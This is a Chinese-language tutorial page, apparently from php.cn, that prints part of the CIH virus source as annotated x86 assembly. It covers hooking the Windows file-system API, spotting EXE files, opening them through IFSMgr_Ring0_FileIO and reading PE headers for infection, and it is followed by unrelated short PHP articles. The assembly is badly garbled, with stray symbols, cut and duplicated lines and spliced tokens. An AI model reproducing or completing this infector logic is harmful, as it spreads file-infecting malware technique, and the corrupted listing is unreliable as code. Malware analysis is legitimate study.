病毒程式原始碼實例剖析-CIH病毒[3]-php教程-PHP中文網

首頁

後端開發

php教程

病毒程式原始碼實例剖析-CIH病毒[3]

黄舟

Jan 17, 2017 am 11:16 AM

jmp ExitRing0Init ;退出Ring0級
　　
　　;合併後的程式碼大小
　　CodeSizeOfMergeVirusCodeSection = offsetPEwidp.　　InstallFileSystemApiHook:
　　push ebx
　　
　　call @4
　　
　　call @4
　　指令的偏移位址
　　add ebx, FileSystemApiHook-@4 ;加上偏移量的差異等於FileSystemApiHook的偏移
　　
　　push 〠
　　
　　push 〠
　　IFSMgr_RemoveFileSystemApiHook = $
　　dd 00400068h ;使用eax、ecx、edx和flags暫存器
　　pop eax
　　
　　;呼叫原先的IFSMgr_InstallFileSystemApiHook功能連接SystemApiHook-@3[ebx]
　　
　　pop ecx
　　push eax
　　push ebx
　　
　　call OldInstallFileSystemApiHook-@3[ebx]
　　pop ecx
　　
　。mov pop eax
　　pop ebx
　　
　　ret
　　
　　OldInstallFileSystemApiHook ddpe
　　OldInstallFileSystemApiHook ddpe
　　OldInstallFileSystemApiHook ddm ; SystemHook呼叫入口
FileSystemApiHook:
　　@3 = FileSystemApiHook
　　
　　push ad ;儲存
　　pop esi ; mov esi, offset ;esi為當前指令的偏移
　　add esi, VirusGameDataStartAddress-@5 ;esi為FileSystemApiHook的偏移
　　;加上VirusGameDataStartAddress的偏移之差等於VirusGameDataStartAddress的偏移
　　
　　;測試「忙」標誌，「忙」則到pIF test
　　;測試「忙」標誌，「忙」則到pIFSF test$3,7][3]
　　jnz pIFSFunc
　　
　　;如果沒有開啟文件，則前往prevhook
　　lea ebx, [esp+20h+04h+04h　　lea ebx, [esp+20h+04h+04h]d.如下
　　;FileSystemApiHookFunction(pIFSFunc FSDFnAddr , int FunctionNum, int Drive,
　　;int ResourceFlags, int CodePage, pioreq pir)
　　
　　;判斷此次呼叫是否是為了打開文件，如果不是就跳到前一個文件鉤『
　　jne prevhook
　　
　　inc byte ptr (OnBusy-@6)[esi] ; Enable OnBusy ;設定「忙」標誌為「忙」
　『『 ;若磁碟機號碼為03h，則表示該磁碟機是C磁碟
　　mov esi, offset FileNameBuffer
　　add esi, FileNameBuffer-@6 ;esi指向FileNameBuffer 🀜　　〜〜〜) h] ;ebx+ 4為磁碟號的位址
　　
　　;是否UNC(universal naming conventions)位址，若是就轉CallUniToBCSPath
　　cmp al, 0ffh
　　mov ah, ':'
　　
　　mov [esi] , eax ;處理成"X:"的形式，即在盤符後面增加一個冒號
　　
　　inc esi
　　inc esi
　　🀜　　。》＋為普通的字元集，把一般的SPath(unsigned char * pBCSPath, ParsedPath * pUniPath,
　　;unsigned int maxLength, int charSet)
　　CallUniToBCSPath:
　　push 00000000h;　　mov ebx, [ebx+10h]
　　mov eax, [ebx+0ch]
　　add eax, 04h
　　push eax ;Uni字元首址
　　push esi ;BCS字元首址
　　Uniint 20h; 00041h 呼叫id
　　add esp, 04h*04h
　　
　　;判斷檔案是否為EXE檔案
　　cmp [esi+eax-04h], 'EXE.'
　　pop esi
　　jne DisableOnBusy
　　cmp [esi+eax-06h], 'KCUF'
　　jne DisableOnBusy
　　
　　ENDIF
　　
　　;判斷文件是否存在，如果不存在，則轉向DisableOnBusy處
　　cmp『　
　　;取得檔案屬性
　　mov ax, 4300h
　　int 20h ;呼叫IFSMgr_Ring0_FileIO取得檔案屬性的功能
　　IFSMgr_Ring0_FileIO = $
　　dd 00400032h ;呼叫號碼
　　
jc DisableOnBusy
　　push ecx
　　
　　;取得IFSMgr_Ring0_FileIO位址
　　mov
　　
　　;判斷是否只讀文件，如果是，則修改文件屬性，否則轉向OpenFile處
　　test cl, 01h
　　jz OpenFile
　　
　　mov ax, 4301h 🀜.修改文件屬性的功能，使文件可寫
　　
　　;開啟文件
　　OpenFile:
　　xor eax , eax
　　mov ah, 0d5h
　　xor ecx, ecx ;檔案屬性
　　xor edx, edx 🎀〨　x ;esi為檔案名稱首址
　　call edi ;呼叫IFSMgr_Ring0_FileIO開啟檔案的功能
　　
xchg ebx, eax ;在ebx中保存文件句柄
　　
　　;是否需要恢復文件屬性(有寫屬性就不需要恢復了)
　　pop ecx 　jz IsOpenFileOK
　　
　　;恢復檔案屬性
mov ax, 4301h
　　call edi ;恢復檔案屬性
　　
　　;檔案開啟是否成功，如果不成功，則轉向DisableOnBusy處
　　IsOpenFiledOpenxOpenp.
　　
　　;檔案開啟成功
　　push esi ;把檔案名稱資料區首址入棧
　　
　　pushf ;CF = 0，保存標誌位
　　
　　add esi, DataBuffer-@7 ;esi『 , eax
　　mov ah, 0d6h ;IFSMgr_Ring0_FileIO的讀取文件功能號(R0_READFILE)
　　
　　;為了達到使病毒程式碼長度最少的目的，把eax保存到ebp
　Fv 『讀4個位元組
　　pop ecx
　　push 0000003ch ;讀取DOS檔案頭偏移3ch處的Windows檔案頭首偏移
　　pop edx
　　call edi ;讀取檔案到esi
　　🀜　　〜)　　;取得圖形檔案頭的PE標記和已感染標記
　　dec edx
　　mov eax, ebp ;功能號
　　call edi ;讀到esi 🀜　　〜　〜〜　是否為WinZip自解壓縮文件，如果是，就不感染Self-Extractor *
　　cmp dword ptr [esi], 00455000h ;判斷是否是PE檔案(標誌"PE/0/0")
　　jne CloseFile ;
　　
　　;如果是PE文件，且沒有被感染，就開始感染該文件
　　push ebx ;保存檔案句柄
　　push 00h『1 標記標記　〜1〜」
　　push edx ;edx指向PE檔案頭偏移00h
　　push edi ;edi為IFSMgr_Ring0_FileIO的位址
　　
　　mov dr1, esp ;儲存」　　
　　;讀取文件頭
　　mov eax, ebp
　　mov cl, SizeOfImageHeaderToRead ;要讀2個字元
push eax ;檔案指標
　　
　　lea eax, (NewAddressOfEntryPoint-@8)[esi]
　　push eax ; eax, word ptr (SizeOfOptionalHeader-@8)[esi]
　　lea edx, [eax+edx+12h] ;edx為病毒程式碼區塊表的偏移
　　
　　;項目的大小
　　
　　mov cl, (NumberOfSections-@8)[esi]
　　
　　mul cl ;每個區塊表　塊數等於表塊大小表塊大小　lea esi, (StartOfSectionTable -@8)[esi] ;esi指向區塊表首址(在病毒動態資料區中)

以上就是病毒程式原始碼實例剖析-CIH病毒[3]的內容，更多相關內容請關注PHP中文網（ www.php.cn）！

陳述

本文內容由網友自願投稿，版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容，請聯絡admin@php.cn

PHP的當前狀態：查看網絡開發趨勢Apr 13, 2025 am 12:20 AM

PHP在現代Web開發中仍然重要，尤其在內容管理和電子商務平台。 1)PHP擁有豐富的生態系統和強大框架支持，如Laravel和Symfony。 2)性能優化可通過OPcache和Nginx實現。 3)PHP8.0引入JIT編譯器，提升性能。 4)雲原生應用通過Docker和Kubernetes部署，提高靈活性和可擴展性。

PHP與其他語言：比較Apr 13, 2025 am 12:19 AM

PHP適合web開發，特別是在快速開發和處理動態內容方面表現出色，但不擅長數據科學和企業級應用。與Python相比，PHP在web開發中更具優勢，但在數據科學領域不如Python；與Java相比，PHP在企業級應用中表現較差，但在web開發中更靈活；與JavaScript相比，PHP在後端開發中更簡潔，但在前端開發中不如JavaScript。

PHP與Python：核心功能Apr 13, 2025 am 12:16 AM

PHP和Python各有優勢，適合不同場景。 1.PHP適用於web開發，提供內置web服務器和豐富函數庫。 2.Python適合數據科學和機器學習，語法簡潔且有強大標準庫。選擇時應根據項目需求決定。

PHP：網絡開發的關鍵語言Apr 13, 2025 am 12:08 AM

PHP是一種廣泛應用於服務器端的腳本語言，特別適合web開發。 1.PHP可以嵌入HTML，處理HTTP請求和響應，支持多種數據庫。 2.PHP用於生成動態網頁內容，處理表單數據，訪問數據庫等，具有強大的社區支持和開源資源。 3.PHP是解釋型語言，執行過程包括詞法分析、語法分析、編譯和執行。 4.PHP可以與MySQL結合用於用戶註冊系統等高級應用。 5.調試PHP時，可使用error_reporting()和var_dump()等函數。 6.優化PHP代碼可通過緩存機制、優化數據庫查詢和使用內置函數。 7

PHP：許多網站的基礎Apr 13, 2025 am 12:07 AM

PHP成為許多網站首選技術棧的原因包括其易用性、強大社區支持和廣泛應用。 1)易於學習和使用，適合初學者。 2)擁有龐大的開發者社區，資源豐富。 3)廣泛應用於WordPress、Drupal等平台。 4)與Web服務器緊密集成，簡化開發部署。

超越炒作：評估當今PHP的角色Apr 12, 2025 am 12:17 AM

PHP在現代編程中仍然是一個強大且廣泛使用的工具，尤其在web開發領域。 1)PHP易用且與數據庫集成無縫，是許多開發者的首選。 2)它支持動態內容生成和麵向對象編程，適合快速創建和維護網站。 3)PHP的性能可以通過緩存和優化數據庫查詢來提升，其廣泛的社區和豐富生態系統使其在當今技術棧中仍具重要地位。